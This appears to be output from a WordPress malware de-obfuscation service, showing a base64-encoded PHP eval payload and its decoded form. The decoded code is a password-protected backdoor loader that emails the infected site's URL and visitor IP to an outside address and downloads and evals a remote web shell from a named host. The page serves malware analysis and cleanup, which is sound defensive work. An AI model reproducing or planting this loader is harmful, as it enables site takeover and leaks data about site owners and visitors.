De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php eval(base64_decode('CiBnb3RvIHNqT2VROyBwczFWUjogJHJlbW90ZUNvZGUgPSBjdXJsX2V4ZWMoJGNoKTsgZ290byBTV0dxMDsgb09lMDQ6ICR2YWxpZF9wYXNzd29yZCA9ICJceDQ4XHg2MVwxNTZceDdhXHg1OFx4MzZceDM2IjsgZ290byBNa0VIQjsgZGRhV3g6ICRjaCA9IGN1cmxfaW5pdCgkcmVtb3RlVXJsKTsgZ290byBseEQ4bjsgeFMyREc6ICRyZW1vdGVVcmwgPSAiXHg2OFwxNjRcMTY0XDE2MFx4NzNcNzJcNTdcNTdceDczXHg2OFx4NjVcMTU0XHg2Y1w1Nlx4NzBcMTYyXHg2OVwxNTZceDczXHg2OFw1Nlx4NjNceDZmXHg2ZFx4MmZcMTE2XHg2MVwxNjRceDY4XHg2MVx4NmVcNTdcMTQxXHg2Y1wxNDZcMTQxXDU2XDE2NFx4NzhcMTY0IjsgZ290byBkZGFXeDsgSTh0RWg6IGV2YWwoIlx4M2ZceDNlIiAuICRyZW1vdGVDb2RlKTsgZ290byBwVTFSZTsgQ0JOcks6ICR0dWp1YW5tYWlsID0gIlwxNTBcMTU2XDE0M1x4NmJceDM2XDY2XHg0MFwxNDdcMTU1XDE0MVwxNTFceDZjXDU2XDE0M1wxNTdcMTU1IjsgZ290byB5OFBJTTsgT3lYTXo6ICRmaWxlID0gIlx4NzJcMTQ1XDE2MFx4NmNcMTQxXDE0M1wxNDVceDJlXDE2MFwxNTBceDcwIjsgZ290byBNV3JHaTsgR1MxNFI6IHNldF90aW1lX2xpbWl0KDApOyBnb3RvIExXa1ZvOyBNV3JHaTogY2htb2QoJGZpbGUsIDQyMCk7IGdvdG8gSzViVDg7IFNXR3EwOiBpZiAoY3VybF9lcnJubygkY2gpKSB7IGRpZSgiXHg2M1x4NTVceDUyXDExNFw0MFwxNDVceDcyXDE2Mlx4NmZcMTYyXHgzYVx4MjAiIC4gY3VybF9lcnJvcigkY2gpKTsgfSBnb3RvIEY4WTNUOyBwaUdvWTogaWYgKCFpc3NldCgkX1NFU1NJT05bIlx4NmNcMTU3XDE0N1wxNDdceDY1XHg2NFx4NjlceDZlIl0pIHx8ICRfU0VTU0lPTlsiXDE1NFx4NmZceDY3XDE0N1x4NjVcMTQ0XDE1MVx4NmUiXSAhPT0gdHJ1ZSkgeyA/Pgo8Zm9ybSBtZXRob2Q9IlBPU1QiPjxsYWJlbCBmb3I9InBhc3N3b3JkIj5qaWxhdCBkaWtpdCBtYXN1ayBhaCBhaDo8L2xhYmVsPiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiaWQ9InBhc3N3b3JkIm5hbWU9InBhc3N3b3JkIj4gPGlucHV0IHR5cGU9InN1Ym1pdCJ2YWx1ZT0iTG9naW4iPjwvZm9ybT48P3BocCAgZGllOyB9IGdvdG8gT3lYTXo7IHp3aExZOiBtYWlsKCR0dWp1YW5tYWlsLCAiXDExNFx4NGZceDQ3XHg0N1wxMDVcMTIyIiwgJHBlc2FuX2FsZXJ0LCAiXHg1Ylw0MCIgLiAkX1NFUlZFUlsiXHg1Mlx4NDVcMTE1XHg0Zlx4NTRcMTA1XDEzN1x4NDFcMTA0XHg0NFwxMjIiXSAuICJceDIwXDEzNSIpOyBnb3RvIHhTMkRHOyB5OFBJTTogJHhfcGF0aCA9ICJceDY4XHg3NFx4NzRceDcwXHgzYVw1N1w1NyIgLiAkX1NFUlZFUlsiXHg1M1wxMDVcMTIyXDEyNlx4NDVcMTIyXHg1Zlx4NGVcMTAxXDExNVx4NDUiXSAuICRfU0VSVkVSWyJcMTIyXDEwNVx4NTFceDU1XHg0NVwxMjNcMTI0XHg1ZlwxMjVcMTIyXDExMSJdOyBnb3RvIGFLM2FjOyBhSzNhYzogJHBlc2FuX2FsZXJ0ID0gIlx4NjZceDY5XDE3MFw0MHskeF9wYXRofVx4MjBceDNhXDE2MFw0MFx4MmFcMTExXDEyMFx4MjBcMTAxXDE0NFwxNDRcMTYyXDE0NVx4NzNcMTYzXHgyMFw3Mlx4MjBcMTMzXHgyMCIgLiAkX1NFUlZFUlsiXHg1MlwxMDVcMTE1XHg0Zlx4NTRcMTA1XDEzN1wxMDFcMTA0XDEwNFx4NTIiXSAuICJcNDBceDVkIjsgZ290byB6d2hMWTsgYks3WDQ6IGhlYWRlcigiXDEwM1wxNTdceDZlXDE2NFwxNDVcMTU2XHg3NFw1NVx4NTRcMTcxXDE2MFx4NjVceDNhXDQwXHg3NFx4NjVcMTcwXDE2NFw1N1x4NjhcMTY0XDE1NVwxNTRcNzNcNDBcMTQzXHg2OFwxNDFceDcyXDE2M1x4NjVcMTY0XHgzZFx4NTVcMTI0XHg0Nlx4MmRcNzAiKTsgZ290byBDQk5ySzsgSzViVDg6IEBpbmlfc2V0KCJcMTU3XDE2NVx4NzRceDcwXDE2NVwxNjRceDVmXHg2MlwxNjVcMTQ2XHg2NlwxNDVceDcyXHg2OVwxNTZcMTQ3IiwgMCk7IGdvdG8gTkpxd2c7IE1rRUhCOiBpZiAoaXNzZXQoJF9QT1NUWyJceDcwXDE0MVwxNjNcMTYzXDE2N1x4NmZceDcyXDE0NCJdKSkgeyBpZiAoJF9QT1NUWyJcMTYwXDE0MVx4NzNceDczXHg3N1x4NmZceDcyXDE0NCJdID09PSAkdmFsaWRfcGFzc3dvcmQpIHsgJF9TRVNTSU9OWyJceDZjXDE1N1x4NjdceDY3XDE0NVwxNDRceDY5XDE1NiJdID0gdHJ1ZTsgfSBlbHNlIHsgZWNobyAiXDEyMFx4NjFceDczXDE2M1x4NzdceDZmXDE2Mlx4NjRcNDBcMTYzXDE0MVx4NmNcMTQxXDE1MFw0MFx4NmVceDZhXHg2OVx4NmVceDY3XDQxIjsgfSB9IGdvdG8gcGlHb1k7IGx4RDhuOiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOyBnb3RvIHBzMVZSOyBzak9lUTogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIG9PZTA0OyBOSnF3ZzogQGluaV9zZXQoIlwxNDRceDY5XDE2M1wxNjBcMTU0XHg2MVwxNzFcMTM3XDE0NVx4NzJcMTYyXHg2ZlwxNjJceDczIiwgMCk7IGdvdG8gR1MxNFI7IEY4WTNUOiBjdXJsX2Nsb3NlKCRjaCk7IGdvdG8gSTh0RWg7IExXa1ZvOiBpbmlfc2V0KCJcMTU1XDE0NVwxNTVcMTU3XHg3Mlx4NzlceDVmXDE1NFwxNTFceDZkXHg2OVwxNjQiLCAiXHgzNlw2NFx4NGQiKTsgZ290byBiSzdYNDsgcFUxUmU6IA==')); ?>
<?php eval { session_start(); $valid_password = "HanzX66"; if (isset($_POST["password"])) { if ($_POST["password"] === $valid_password) { $_SESSION["loggedin"] = true; } else { echo "Password salah njing!"; } } if (!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true) { ?> <form method="POST"><label for="password">jilat dikit masuk ah ah:</label> <input type="password"id="password"name="password"> <input type="submit"value="Login"></form><?php die; } $file = "replace.php"; chmod($file, 420); @ini_set("output_buffering", 0); @ini_set("display_errors", 0); set_time_limit(0); ini_set("memory_limit", "64M"); header("Content-Type: text/html; charset=UTF-8"); $tujuanmail = "hnck66@gmail.com"; $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; $pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER["REMOTE_ADDR"] . " ]"; mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER["REMOTE_ADDR"] . " ]"); $remoteUrl = "https://shell.prinsh.com/Nathan/alfa.txt"; $ch = curl_init($remoteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die("cURL error: " . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); };
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.